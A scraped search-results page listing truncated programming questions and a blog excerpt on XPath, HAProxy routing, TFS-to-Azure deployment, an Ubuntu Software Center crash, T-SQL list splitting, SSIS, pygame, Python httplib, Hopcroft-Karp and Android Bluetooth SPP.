Search Results

Search found 1472 results on 59 pages for 'harry len'.

Page 49/59

  • XML Path needed

    - by user3696029
    I have the following XML file: <?xml version="1.0" encoding="UTF-8"?> <bookstore> <book category="COOKING"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="WEB"> <title lang="en">XQuery Kick Start</title> <author>James McGovern</author> <author>Per Bothner</author> <author>Kurt Cagle</author> <author>James Linn</author> <author>Vaidyanathan Nagarajan</author> <year>2003</year> <price>49.99</price> </book> <book category="WEB"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore> I need to write an XPath expression that returns books published after 2003 in the CHILDREN category, and I just need to display the author and title of each book. What is frustrating is that I have everything in the XPath I wrote except the author.
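
    One possible XPath for this, sketched here with lxml (the element and attribute names come from the sample XML above; treat it as a starting point rather than a verified answer):

        from lxml import etree  # assumes lxml is available

        tree = etree.parse("bookstore.xml")  # hypothetical file holding the XML above
        # titles and authors of CHILDREN books published after 2003
        expr = ("/bookstore/book[@category='CHILDREN' and year>2003]/title"
                " | /bookstore/book[@category='CHILDREN' and year>2003]/author")
        for node in tree.xpath(expr):
            print(node.tag, node.text)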

    Read the article

  • How to divert traffic based on hostname using HAProxy?

    - by Bosky
    I've had some initial success with HAProxy setting up a bunch of app servers listening on various other ports. I now have another webserver listening on one port, and I'd like to know what changes to make to my config so that it routes traffic by hostname as well. The following is the current setup, assuming: my apache webserver is running at example.com:8001 my bunch of app servers 0.0.0.0:8081, 0.0.0.0:8082 , 0.0.0.0:8083 global log 127.0.0.1 local0 log 127.0.0.1 local1 notice maxconn 4096 debug #quiet #user haproxy #group haproxy defaults log global mode http option httplog option dontlognull retries 3 redispatch maxconn 2000 contimeout 5000 clitimeout 50000 srvtimeout 50000 listen appservers 0.0.0.0:80 mode http balance roundrobin option httpclose option forwardfor #option httpchk HEAD /check.txt HTTP/1.0 server inst1 0.0.0.0:8081 cookie server01 check inter 2000 fall 3 server inst2 0.0.0.0:8082 cookie server02 check inter 2000 fall 3 server inst3 0.0.0.0:8083 cookie server01 check inter 2000 fall 3 server inst4 0.0.0.0:8084 cookie server02 check inter 2000 fall 3 capture cookie vgnvisitor= len 32 (Any other comments on the above setup are welcome.) Now I'd like to keep the same setup as above, but in addition, if the hostname is myspecialtopleveldomain<dot>com, I would like to route traffic to example<dot>com:8001
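
    A common way to do this in HAProxy is to split the single listen section into a frontend and two backends and switch on the Host header with an ACL. The sketch below is untested and only assumes the hostnames and ports mentioned above:

        frontend http-in
            bind 0.0.0.0:80
            mode http
            acl is_special hdr(host) -i myspecialtopleveldomain.com
            use_backend apache if is_special
            default_backend appservers

        backend apache
            mode http
            server apache1 example.com:8001

        backend appservers
            mode http
            balance roundrobin
            option httpclose
            option forwardfor
            server inst1 0.0.0.0:8081 cookie server01 check inter 2000 fall 3
            # ...repeat the remaining server lines from the listen section above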

    Read the article

  • Advanced Continuous Delivery to Azure from TFS, Part 1: Good Enough Is Not Great

    - by jasont
    The folks over on the TFS / Visual Studio team have been working hard at releasing a steady stream of new features for their new hosted Team Foundation Service in the cloud. One of the most significant features released was simple continuous delivery of your solution into your Azure deployments. The original announcement from Brian Harry can be found here. Team Foundation Service is a great platform for .Net developers who are used to working with TFS on-premises. I’ve been using it since it became available at the //BUILD conference in 2011, and when I recently came to work at Stackify, it was one of the first changes I made. Managing work items is much easier than the tool we were using previously, although there are some limitations (more on that in another blog post). However, when continuous deployment was made available, it blew my mind. It was the killer feature I didn’t know I needed. Not to say that I wasn’t previously an advocate for continuous delivery; just that it was always a pain to set up and configure. Having it hosted - and a one-click setup – well, that’s just the best thing since sliced bread. It made perfect sense: my source code is in the cloud, and my deployment is in the cloud. Great! I can queue up a build from my iPad or phone and just let it go! I quickly tore through the quick setup and saw it all work… sort of. This will be the first in a three part series on how to take the building block of Team Foundation Service continuous delivery and build a CD model that will actually work for any team deploying something more advanced than a “Hello World” example. Part 1: Good Enough Is Not Great Part 2: A Model That Works: Branching and Multiple Deployment Environments Part 3: Other Considerations: SQL, Custom Tasks, Etc Good Enough Is Not Great There. I’ve said it. I certainly hope no one on the TFS team is offended, but it’s the truth. Let’s take a look under the hood and understand how it works, and then why it’s not enough to handle real world CD as-is. How it works. (note that I’ve skipped a couple of steps; I already have my accounts set up and something deployed to Azure) The first step is to establish some oAuth magic between your Azure management portal and your TFS Instance. You do this via the management portal. Once it’s done, you have a new build process template in your TFS instance. (Image lifted from the documentation) From here, you’ll get the usual prompts for security, allowing access, etc. But you’ll also get to pick which Solution in your source control to build. Here’s what the bulk of the build definition looks like. All I’ve had to do is add in the solution to build (notice that mine is from a specific branch – Release – more on that later) and I’ve changed the configuration. I trigger the build, and voila! I have an Azure deployment a few minutes later. The beauty of this is that it’s all in the cloud and I’m not waiting for my machine to compile and upload the package. (I also had to enable the build definition first – by default it is created in disabled state, probably a good thing since it will trigger on every.single.checkin by default.) I get to see a history of deployments from the Azure portal, and can link into TFS to see the associated changesets and work items. You’ll notice also that this build definition also automatically put my code in the Staging slot of my Azure deployment – more on this soon. For now, I can VIP swap and be in production. (P.S. I hate VIP swap and “production” and “staging” in Azure. 
More on that later too.) That’s it. That’s the default out-of-box experience. Easy, right? But it’s full of room for improvement, so let’s get into that….   The Problems Nothing is perfect (except my code – it’s always perfect), and neither is Continuous Deployment without a bit of work to help it fit your dev team’s process. So what are the issues? Issue 1: Staging vs QA vs Prod vs whatever other environments your team may have. This, for me, is the big hairy one. Remember how this automatically deployed to staging rather than prod for us? There are a couple of issues with this model: If I want to deliver to prod, it requires intervention on my part after deployment (via a VIP swap). If I truly want to promote between environments (i.e. Nightly Build –> Stable QA –> Production) I likely have configuration changes between each environment such as database connection strings and this process (and the VIP swap) doesn’t account for this. Yet. Issue 2: Branching and delivering on every check-in. As I mentioned above, I have set this up to target a specific branch – Release – of my code. For the purposes of this example, I have adopted the “basic” branching strategy as defined by the ALM Rangers. This basically establishes a “Main” trunk where you branch off Dev and Release branches. Granted, the Release branch is usually the only thing you will deploy to production, but you certainly don’t want to roll to production automatically when you merge to the Release branch and check-in (unless you like the thrill of it, and in that case, I like your style, cowboy….). Rather, you have nightly build and QA environments, or if you’ve adopted the feature-branch model you have environments for those. Those are the environments you want to continuously deploy to. But that takes us back to Issue 1: we currently have a 1:1 solution to Azure deployment target. Issue 3: SQL and other custom tasks. Let’s be honest and address the elephant in the room: I need to get some sleep because I see an elephant in the room. But seriously, I can’t think of an application I have touched in the last 10 years that doesn’t need to consider SQL changes when deploying code and upgrading an environment. Microsoft seems perfectly content to ignore this elephant for now: yes, they’ve added Data Tier Applications. But let’s be honest with ourselves again: no one really uses it, and it’s not suitable for anything more complex than a Hello World sample project database. Why? Because it doesn’t fit well into a great source control story. Developers make stored procedure and table changes all day long while coding complex applications, and if someone forgets to go update the DACPAC before the automated deployment, you have a broken build until it’s completed. Developers – not just DBAs – also like to work with SQL in SQL tools, not in Visual Studio. I’m really picking on SQL because that’s generally the biggest concern that I hear. But we need to account for any custom tasks as well in the build process.   The Solutions… ? We’ve taken a look at how this all works, and addressed the shortcomings. In my next post (which I promise will be very, very soon), I will detail how I’ve overcome these shortcomings and used this foundation to create a mature, flexible model for deploying my app – any version, any time, to any environment.

    Read the article

  • How to fix Software Center crashes?

    - by shandna towns
    E: Type '<!DOCTYPE' is not known on line 1 in source list /etc/apt/sources.list.d/medibuntu.list E: The list of sources could not be read. shandanatowns@ubuntu:~$ software-center 2012-09-25 12:23:35,115 - softwarecenter.ui.gtk3.app - INFO - setting up proxy 'None' 2012-09-25 12:23:35,123 - softwarecenter.db.database - INFO - open() database: path=None use_axi=True use_agent=True (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:34:20: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:34:22: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:56:20: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:56:22: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:60:20: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:60:22: Not using units is deprecated. Assuming 'px'. 2012-09-25 12:23:35,472 - softwarecenter.backend.reviews - WARNING - Could not get usefulness from server, no username in config file 2012-09-25 12:23:35,477 - softwarecenter.fixme - WARNING - logs to the root logger: '('/usr/lib/python2.7/dist-packages/gi/importer.py', 51, 'find_module')' 2012-09-25 12:23:35,477 - root - ERROR - Could not find any typelib for LaunchpadIntegration 2012-09-25 12:23:35,605 - softwarecenter.ui.gtk3.app - INFO - show_available_packages: search_text is '', app is None. 2012-09-25 12:23:35,987 - softwarecenter.db.pkginfo_impl.aptcache - INFO - aptcache.open() Traceback (most recent call last): File "/usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py", line 257, in open self._cache = apt.Cache(progress) File "/usr/lib/python2.7/dist-packages/apt/cache.py", line 102, in __init__ self.open(progress) File "/usr/lib/python2.7/dist-packages/apt/cache.py", line 149, in open self._list.read_main_list() SystemError: E:Type '<!DOCTYPE' is not known on line 1 in source list /etc/apt/sources.list.d/medibuntu.list 2012-09-25 12:23:37,000 - softwarecenter.db.enquire - ERROR - _get_estimate_nr_apps_and_nr_pkgs failed Traceback (most recent call last): File "/usr/share/software-center/softwarecenter/db/enquire.py", line 115, in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset(0, len(self.db), None, xfilter) File "/usr/share/software-center/softwarecenter/db/appfilter.py", line 89, in __call__ if (not pkgname in self.cache and File "/usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py", line 277, in __contains__ return self._cache.__contains__(k) AttributeError: 'NoneType' object has no attribute '__contains__' Traceback (most recent call last): File "/usr/bin/software-center", line 182, in <module> app.run(args) File "/usr/share/software-center/softwarecenter/ui/gtk3/app.py", line 1385, in run self.show_available_packages(args) File "/usr/share/software-center/softwarecenter/ui/gtk3/app.py", line 1323, in show_available_packages self.view_manager.set_active_view(ViewPages.AVAILABLE) File "/usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py", line 151, in set_active_view view_widget.init_view() File "/usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py", line 173, in init_view self.cache, self.db, self.icons, self.apps_filter) 
File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 81, in __init__ self.build() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 322, in build self._build_homepage_view() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 120, in _build_homepage_view self._append_whats_new() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 251, in _append_whats_new whats_new_cat = self._update_whats_new_content() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 236, in _update_whats_new_content docs = whats_new_cat.get_documents(self.db) File "/usr/share/software-center/softwarecenter/db/categories.py", line 132, in get_documents nonblocking_load=False) File "/usr/share/software-center/softwarecenter/db/enquire.py", line 317, in set_query self._blocking_perform_search() File "/usr/share/software-center/softwarecenter/db/enquire.py", line 212, in _blocking_perform_search matches = enquire.get_mset(0, self.limit, None, xfilter) File "/usr/share/software-center/softwarecenter/db/appfilter.py", line 89, in __call__ if (not pkgname in self.cache and File "/usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py", line 277, in __contains__ return self._cache.__contains__(k) AttributeError: 'NoneType' object has no attribute '__contains__'

    Read the article

  • How to use a list of values in Excel as filter in a query

    - by Luca Zavarella
    It often happens that a customer provides us with a list of items for which to extract certain information. Imagine, for example, that our client wishes to have the header information of the sales orders only for certain orders. Most likely they will give us a list of items in a column in Excel, or, less probably, a simple text file with the identification codes: As long as the given values are at best a dozen, it costs us nothing to copy and paste those values into our SSMS and place them in a WHERE clause, using the IN operator, making sure to include the quotes in the case of alphanumeric elements (the sample database is AdventureWorks2008R2): SELECT * FROM Sales.SalesOrderHeader AS SOH WHERE SOH.SalesOrderNumber IN ( 'SO43667' ,'SO43709' ,'SO43726' ,'SO43746' ,'SO43782' ,'SO43796') Clearly, the need to add commas and quotes becomes a hassle when dealing with hundreds of items (which of course has happened to us!). It would be convenient to do a simple copy and paste, leave the items exactly as pasted, and still have the query work fine. We can get this convenience via a User Defined Function that returns the items in a table. We simply provide the function with an input string parameter containing the pasted items. Here is the T-SQL code, with comments to clarify what it does: CREATE FUNCTION [dbo].[SplitCRLFList] (@List VARCHAR(MAX)) RETURNS @ParsedList TABLE ( --< Set the item length as your needs Item VARCHAR(255) ) AS BEGIN DECLARE --< Set the item length as your needs @Item VARCHAR(255) ,@Pos BIGINT --< Trim TABs due to indentations SET @List = REPLACE(@List, CHAR(9), '') --< Trim leading and trailing spaces, then add a CR/LF at the end of the list SET @List = LTRIM(RTRIM(@List)) + CHAR(13) + CHAR(10) --< Set the position at the first CR/LF in the list SET @Pos = CHARINDEX(CHAR(13) + CHAR(10), @List, 1) --< If chars other than CR/LFs exist in the list then... IF REPLACE(@List, CHAR(13) + CHAR(10), '') <> '' BEGIN --< Loop until no CR/LFs are left (not found = CHARINDEX returns 0) WHILE @Pos > 0 BEGIN --< Get the heading list chars from the first char to the first CR/LF and trim spaces SET @Item = LTRIM(RTRIM(LEFT(@List, @Pos - 1))) --< If the so calculated item is not empty... IF @Item <> '' BEGIN --< ...insert it in the @ParsedList temporary table INSERT INTO @ParsedList (Item) VALUES (@Item) --(CAST(@Item AS int)) --< Use the appropriate conversion if needed END --< Remove the first item from the list... SET @List = RIGHT(@List, LEN(@List) - @Pos - 1) --< ...and set the position to the next CR/LF SET @Pos = CHARINDEX(CHAR(13) + CHAR(10), @List, 1) --< Repeat this block while the loop condition above still holds END END RETURN END At this point, having created the UDF, our query is trivially transformed into: SELECT * FROM Sales.SalesOrderHeader AS SOH WHERE SOH.SalesOrderNumber IN ( SELECT Item FROM SplitCRLFList('SO43667 SO43709 SO43726 SO43746 SO43782 SO43796') AS SCL) Convenient, isn't it? You can find the script DBA_SplitCRLFList.sql here. Bye!!

    Read the article

  • SSIS Technique to Remove/Skip Trailer and/or Bad Data Row in a Flat File

    - by Compudicted
    I noticed that the question of how to skip or bypass a trailer record or a badly formatted/empty row in an SSIS package keeps coming back on the MSDN SSIS Forum. I tried to figure out the reason why, and after an extensive search inside the forum and outside it on the entire Web (using several search engines) I found that even though there are a number of posts and articles on the topic, none of them employ the simplest and most efficient technique. When I say efficient I mean the shortest time to solution for the fellow developers. OK, enough talk. Let's face the problem: Typically a flat file (e.g. a comma delimited/CSV) needs to be processed (loaded into a database in most cases really). Oftentimes, such an input file is produced by some sort of an out-of-control, third-party solution and would come in with some garbage characters and/or even malformed/mis-formatted rows. One such example could be this imaginary file: As you can see several rows have no data and there is an occasional garbage character (1, in this example on row #7). Our task is to produce a clean file that will only capture the meaningful data rows. As an aside, our output/target may be a database table, but for the purpose of this exercise we will simply re-format the source. Let's outline our course of action to start off: We will use SSIS 2005 to create a DFT; the DFT will use a Flat File Source for our input [bad] flat file; we will use a Conditional Split to process the bad input file; and finally dump the resulting data to a new [clean] file. Well, only four steps, let's see if it is too much work. 1: Start BIDS and add a DFT to the Control Flow designer (I named it Process Dirty File DFT). 2 and 3: I had added the data viewer just to see what I am getting; alas, surprisingly, the data issues were not visible in it. What is really key in this approach is to properly set up the Conditional Split Transformation, and specifically its SSIS Expression LEN([After CS Column 0]) > 1 The point is to employ the right Boolean expression (yes, the Conditional Split accepts only Boolean conditions). For the sake of this post I re-named the Output Name "No Empty Rows", but by default it will be named Case 1 (remember to drag your first column into the expression area)! You can close your Conditional Split now. The next part will be crucial – consuming the output of our Conditional Split. Last step - #4: Add a Flat File Destination or any other destination you need. Click on the Conditional Split and drag the green arrow onto the target. When you do so, make sure you choose the No Empty Rows output and NOT the Conditional Split Default Output. Make the necessary mappings. As the last step, we run the package to examine the produced output file. F5: and… it looks great!

    Read the article

  • what is the best way to use loops to detect events while the main loop is running?

    - by yao jiang
    I am making an "game" that has pathfinding using pygame. I am using Astar algo. I have a main loop which draws the whole map. In the loop I check for events. If user press "enter" or "space", random start and end are selected, then animation starts and it will try to get from start to end. My draw function is stupid as hell right now, it works as expected but I feel that I am doing it wrong. It'll draw everything to the end of the animation. I am also detecting events in there as well. What is a better way of implementing the draw function such that it will draw one "step" at a time while checking for events? animating = False; while loop: check events: if not animating: # space or enter press will choose random start/end coords if enter_pressed or space_pressed: start, end = choose_coords route = find_route(start, end) draw(start, end, grid, route) else: # left click == generate an event to block the path # right click == user can choose a new destination if left_mouse_click: gen_event() reroute() elif right_mouse_click: new_end = new_end() new_start = current_pos() route = find_route(new_start, new_end) draw(new_start, new_end, grid, route) # draw out the grid def draw(start, end, grid, route_coord): # draw the end coords color = red; pick_image(screen, color, width*end[1],height*end[0]); pygame.display.flip(); # then draw the rest of the route for i in range(len(route_coord)): # pausing because we want animation time.sleep(speed); # get the x/y coords x,y = route_coord[i]; event_on = False; if grid[x][y] == 2: color = green; elif grid[x][y] == 3: color = blue; for event in pygame.event.get(): if event.type == pygame.MOUSEBUTTONDOWN: if event.button == 3: print "destination change detected, rerouting"; # get mouse position, px coords pos = pygame.mouse.get_pos(); # get grid coord c = pos[0] // width; r = pos[1] // height; grid[r][c] = 4; end = [r, c]; elif event.button == 1: print "user generated event"; pos = pygame.mouse.get_pos(); # get grid coord c = pos[0] // width; r = pos[1] // height; # mark it as a block for now grid[r][c] = 1; event_on = True; if check_events([x,y]) or event_on: # there is an event # mark it as a block for now grid[y][x] = 1; pick_image(screen, event_x, width*y, height*x); pygame.display.flip(); # then find a new route new_start = route_coord[i-1]; marked_grid, route_coord = find_route(new_start, end, grid); draw(new_start, end, grid, route_coord); return; # just end draw here so it wont throw the "index out of range" error elif grid[x][y] == 4: color = red; pick_image(screen, color, width*y, height*x); pygame.display.flip(); # clear route coord list, otherwise itll just add more unwanted coords route_coord_list[:] = [];
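
    One common restructuring, sketched below, keeps the route and a step counter as state and draws exactly one cell per pass of the main loop, so events are always handled between steps. Names such as choose_coords, find_route and draw_cell stand in for the question's own helpers and are assumptions, not code from the original:

        import pygame

        # Sketch: advance the animation one step per frame instead of looping inside draw()
        clock = pygame.time.Clock()
        route, step, animating = [], 0, False
        running = True

        while running:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                elif event.type == pygame.KEYDOWN and not animating:
                    start, end = choose_coords()        # assumed helper
                    route = find_route(start, end)      # assumed helper
                    step, animating = 0, True
                elif event.type == pygame.MOUSEBUTTONDOWN and animating:
                    # mark a block or pick a new destination here, then recompute
                    route = find_route(route[step], end)
                    step = 0

            if animating and step < len(route):
                x, y = route[step]
                draw_cell(x, y)                         # assumed helper: draws one cell only
                step += 1
                animating = step < len(route)

            pygame.display.flip()
            clock.tick(15)   # frames per second replaces time.sleep for pacing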

    Read the article

  • python unhashable type - posting xml data

    - by eterry28
    First, I'm not a python programmer. I'm an old C dog that's learned new Java and PHP tricks, but python looks like a pretty cool language. I'm getting an error that I can't quite follow. The error follows the code below. import httplib, urllib url = "pdb-services-beta.nipr.com" xml = '<?xml version="1.0"?><!DOCTYPE SCB_Request SYSTEM "http://www.nipr.com/html/SCB_XML_Request.dtd"><SCB_Request Request_Type="Create_Report"><SCB_Login_Data CustomerID="someuser" Passwd="somepass" /><SCB_Create_Report_Request Title=""><Producer_List><NIPR_Num_List_XML><NIPR_Num NIPR_Num="8980608" /><NIPR_Num NIPR_Num="7597855" /><NIPR_Num NIPR_Num="10166016" /></NIPR_Num_List_XML></Producer_List></SCB_Create_Report_Request></SCB_Request>' params = {} params['xmldata'] = xml headers = {} headers['Content-type'] = 'text/xml' headers['Accept'] = '*/*' headers['Content-Length'] = "%d" % len(xml) connection = httplib.HTTPSConnection(url) connection.set_debuglevel(1) connection.request("POST", "/pdb-xml-reports/scb_xmlclient.cgi", params, headers) response = connection.getresponse() print response.status, response.reason data = response.read() print data connection.close Here's the error: Traceback (most recent call last): File "C:\Python27\tutorial.py", line 14, in connection.request("POST", "/pdb-xml-reports/scb_xmlclient.cgi", params, headers) File "C:\Python27\lib\httplib.py", line 958, in request self._send_request(method, url, body, headers) File "C:\Python27\lib\httplib.py", line 992, in _send_request self.endheaders(body) File "C:\Python27\lib\httplib.py", line 954, in endheaders self._send_output(message_body) File "C:\Python27\lib\httplib.py", line 818, in _send_output self.send(message_body) File "C:\Python27\lib\httplib.py", line 790, in send self.sock.sendall(data) File "C:\Python27\lib\ssl.py", line 229, in sendall v = self.send(data[count:]) TypeError: unhashable type My log file says that the xmldata parameter is empty. Any ideas?
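
    The third argument to HTTPSConnection.request has to be a string, not a dict; the dict ends up being sliced inside httplib/ssl, which is what raises the unhashable-type error. A hedged sketch of the usual fix, URL-encoding the parameter (this assumes the CGI expects an ordinary form field named xmldata rather than a raw XML body):

        import httplib, urllib

        body = urllib.urlencode({'xmldata': xml})   # xml is the string built above
        headers = {'Content-type': 'application/x-www-form-urlencoded',
                   'Accept': '*/*',
                   'Content-Length': str(len(body))}

        connection = httplib.HTTPSConnection(url)
        connection.request("POST", "/pdb-xml-reports/scb_xmlclient.cgi", body, headers)
        response = connection.getresponse()
        print response.status, response.reason
        print response.read()
        connection.close()   # note the parentheses; connection.close alone does nothing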

    Read the article

  • Hopcroft–Karp algorithm in Python

    - by Simon
    I am trying to implement the Hopcroft Karp algorithm in Python using networkx as graph representation. Currently I am as far as this: #Algorithms for bipartite graphs import networkx as nx import collections class HopcroftKarp(object): INFINITY = -1 def __init__(self, G): self.G = G def match(self): self.N1, self.N2 = self.partition() self.pair = {} self.dist = {} self.q = collections.deque() #init for v in self.G: self.pair[v] = None self.dist[v] = HopcroftKarp.INFINITY matching = 0 while self.bfs(): for v in self.N1: if self.pair[v] and self.dfs(v): matching = matching + 1 return matching def dfs(self, v): if v != None: for u in self.G.neighbors_iter(v): if self.dist[ self.pair[u] ] == self.dist[v] + 1 and self.dfs(self.pair[u]): self.pair[u] = v self.pair[v] = u return True self.dist[v] = HopcroftKarp.INFINITY return False return True def bfs(self): for v in self.N1: if self.pair[v] == None: self.dist[v] = 0 self.q.append(v) else: self.dist[v] = HopcroftKarp.INFINITY self.dist[None] = HopcroftKarp.INFINITY while len(self.q) > 0: v = self.q.pop() if v != None: for u in self.G.neighbors_iter(v): if self.dist[ self.pair[u] ] == HopcroftKarp.INFINITY: self.dist[ self.pair[u] ] = self.dist[v] + 1 self.q.append(self.pair[u]) return self.dist[None] != HopcroftKarp.INFINITY def partition(self): return nx.bipartite_sets(self.G) The algorithm is taken from http://en.wikipedia.org/wiki/Hopcroft%E2%80%93Karp_algorithm However it does not work. I use the following test code G = nx.Graph([ (1,"a"), (1,"c"), (2,"a"), (2,"b"), (3,"a"), (3,"c"), (4,"d"), (4,"e"),(4,"f"),(4,"g"), (5,"b"), (5,"c"), (6,"c"), (6,"d") ]) matching = HopcroftKarp(G).match() print matching Unfortunately this does not work, I end up in an endless loop :(. Can someone spot the error, I am out of ideas and I must admit that I have not yet fully understand the algorithm, so it is mostly an implementation of the pseudo code on wikipedia
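
    Two differences from the Wikipedia pseudocode stand out and are the most likely cause of the endless loop (a hedged reading, not a verified fix): the pseudocode starts a DFS only from free vertices of the left partition, i.e. pair[v] is None, while the code above tests if self.pair[v], which is false for every vertex on the first pass, so the matching never grows and bfs() keeps succeeding; and a BFS queue should be consumed with popleft() rather than pop(). A sketch of the two corrected fragments:

        # in match(): augment only from vertices of N1 that are still free
        while self.bfs():
            for v in self.N1:
                if self.pair[v] is None and self.dfs(v):
                    matching = matching + 1

        # in bfs(): consume the deque FIFO
        while len(self.q) > 0:
            v = self.q.popleft()
            # ...rest of bfs() unchanged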

    Read the article

  • SPP Socket createRfcommSocketToServiceRecord will not connect

    - by philDev
    Hello, I want to use Android 2.1 to connect to an external Bluetooth device, wich is offering an SPP port to me. In this case it is an external GPS unit. When I'm trying to connect I can't connect an established socket while being in the "client" mode. Then if I try to set up a socket (being in the server role), to RECEIVE text from my PC everything works just fine. The Computer can connect as the client to the Socket on the Phone via SPP using the SSP UUID or some random UUID. So the Problem is not that I'm using the wrong UUID. But the other way around (e.g. calling connect on the established client socket) createRfcommSocketToServiceRecord(UUID uuid)) just doesn't work. Sadly I don't have the time to inspect the problem further. It would be greate If somebody could point me the right way. In the following part of the Logfile has to be the Problem. Greets PhilDev P.S. I'm going to be present during the Office hours. Here the log file: 03-21 03:10:52.020: DEBUG/BluetoothSocket.cpp(4643): initSocketFromFdNative 03-21 03:10:52.025: DEBUG/BluetoothSocket(4643): connect 03-21 03:10:52.025: DEBUG/BluetoothSocket(4643): doSdp 03-21 03:10:52.050: DEBUG/ADAPTER(2132): create_device(01:00:00:7F:B5:B3) 03-21 03:10:52.050: DEBUG/ADAPTER(2132): adapter_create_device(01:00:00:7F:B5:B3) 03-21 03:10:52.055: DEBUG/DEVICE(2132): Creating device [address = 01:00:00:7F:B5:B3] /org/bluez/2132/hci0/dev_01_00_00_7F_B5_B3 [name = ] 03-21 03:10:52.055: DEBUG/DEVICE(2132): btd_device_ref(0x10c18): ref=1 03-21 03:10:52.065: INFO/BluetoothEventLoop.cpp(1914): event_filter: Received signal org.bluez.Adapter:DeviceCreated from /org/bluez/2132/hci0 03-21 03:10:52.065: INFO/BluetoothService.cpp(1914): ... Object Path = /org/bluez/2132/hci0/dev_01_00_00_7F_B5_B3 03-21 03:10:52.065: INFO/BluetoothService.cpp(1914): ... 
Pattern = 00001101-0000-1000-8000-00805f9b34fb, strlen = 36 03-21 03:10:52.070: DEBUG/DEVICE(2132): *************DiscoverServices******** 03-21 03:10:52.070: INFO/DTUN_HCID(2132): dtun_client_get_remote_svc_channel: starting discovery on (uuid16=0x0011) 03-21 03:10:52.070: INFO/DTUN_HCID(2132): bdaddr=01:00:00:7F:B5:B3 03-21 03:10:52.070: INFO/DTUN_CLNT(2132): Client calling DTUN_METHOD_DM_GET_REMOTE_SERVICE_CHANNEL (id 4) 03-21 03:10:52.070: INFO/(2106): DTUN_ReceiveCtrlMsg: [DTUN] Received message [BTLIF_DTUN_METHOD_CALL] 4354 03-21 03:10:52.070: INFO/(2106): handle_method_call: handle_method_call :: received DTUN_METHOD_DM_GET_REMOTE_SERVICE_CHANNEL (id 4), len 134 03-21 03:10:52.075: ERROR/BTLD(2106): ****************search UUID = 1101*********** 03-21 03:10:52.075: INFO//system/bin/btld(2103): btapp_dm_GetRemoteServiceChannel() 03-21 03:10:52.120: DEBUG/BluetoothService(1914): updateDeviceServiceChannelCache(01:00:00:7F:B5:B3) 03-21 03:10:52.120: DEBUG/BluetoothEventLoop(1914): ClassValue: null for remote device: 01:00:00:7F:B5:B3 is null 03-21 03:10:52.120: INFO/BluetoothEventLoop.cpp(1914): event_filter: Received signal org.bluez.Adapter:PropertyChanged from /org/bluez/2132/hci0 03-21 03:10:52.305: WARN/BTLD(2106): bta_dm_check_av:0 03-21 03:10:56.395: DEBUG/WifiService(1914): ACTION_BATTERY_CHANGED pluggedType: 2 03-21 03:10:57.440: WARN/BTLD(2106): SDP - Rcvd conn cnf with error: 0x4 CID 0x43 03-21 03:10:57.440: INFO/BTL-IFS(2106): send_ctrl_msg: [BTL_IFS CTRL] send BTLIF_DTUN_SIGNAL_EVT (CTRL) 13 pbytes (hdl 10) 03-21 03:10:57.445: INFO/DTUN_CLNT(2132): dtun-rx signal [DTUN_SIG_DM_RMT_SERVICE_CHANNEL] (id 42) len 15 03-21 03:10:57.445: INFO/DTUN_HCID(2132): dtun_dm_sig_rmt_service_channel: success=1, service=00000000 03-21 03:10:57.445: ERROR/DTUN_HCID(2132): discovery unsuccessful! package de.phil_dev.android.BT; import java.io.BufferedInputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.UUID; import android.app.Activity; import android.bluetooth.BluetoothAdapter; import android.bluetooth.BluetoothClass; import android.bluetooth.BluetoothDevice; import android.bluetooth.BluetoothServerSocket; import android.bluetooth.BluetoothSocket; import android.content.Intent; import android.os.Bundle; import android.util.Log; import android.widget.Toast; public class ThinBTClient extends Activity { private static final String TAG = "THINBTCLIENT"; private static final boolean D = true; private BluetoothAdapter mBluetoothAdapter = null; private BluetoothSocket btSocket = null; private BufferedInputStream inStream = null; private BluetoothServerSocket myServerSocket; private ConnectThread myConnection; private ServerThread myServer; // Well known SPP UUID (will *probably* map to // RFCOMM channel 1 (default) if not in use); // see comments in onResume(). private static final UUID MY_UUID = UUID .fromString("00001101-0000-1000-8000-00805F9B34FB"); // .fromString("94f39d29-7d6d-437d-973b-fba39e49d4ee"); // ==> hardcode your slaves MAC address here <== // PC // private static String address = "00:09:DD:50:86:A0"; // GPS private static String address = "00:0B:0D:8E:D4:33"; /** Called when the activity is first created. 
